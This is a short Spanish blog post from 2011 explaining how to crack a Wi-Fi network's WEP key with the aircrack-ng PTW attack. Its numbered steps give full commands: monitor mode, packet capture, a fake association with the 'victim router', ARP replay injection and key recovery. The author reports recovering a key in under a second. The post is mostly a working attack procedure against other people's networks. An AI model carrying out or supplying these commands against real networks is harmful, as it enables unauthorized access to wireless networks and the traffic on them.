1 de enero de 2011

Aircrack PTW

Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng.


Encontrar la clave WEP de una red WIFI por este método requiere que paquetes "arp request/reply", y solo trabaja con encriptacion de 128 y 64 bits. 


Cuando se usa aircrack v1.x es el ataque por defecto, para utilizar el anterior metodo se debe poner la opcion -k, para versiones anteriores de aircrack que soportan PTW se debe usar la opcion -z.


He utilizado este metodo que resulto ser muy efectivo con la version 0.9.1 en Windows, encontro la clave en menos de 1s'. 



Metodología usada:



  1. Poner la tarjeta en modo monitor: airmon-ng start rausb0
  2. Capturar los paquetes: airodump-ng -c [channel] -w [network] --bssid [bssid AP] rausb0
  3. Asociarse con el router victima: aireplay-ng -1 0 -a [BSSID AP] -h [MAC mia] -e [ESSID] rausb0
  4. Envio de ARP: aireplay-ng -3 -b [BSSID AP] -h [MAC mia] rausb0
    • En caso de que no se consigan: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [MAC AP] -h [MAC mia] rausb0     --> Use this packet? y
    • Otra opción es intentar conectarse con otra tarjeta o lapto a esta red para forzar paquetes arp.
  5. Después de generar suficientes paquetes ejecutar Aircrack-ng -a 1 -z archivo.cap
Ejecutar cada ítem anterior en consolas independientes.

Mas documentación:


No hay comentarios:

Publicar un comentario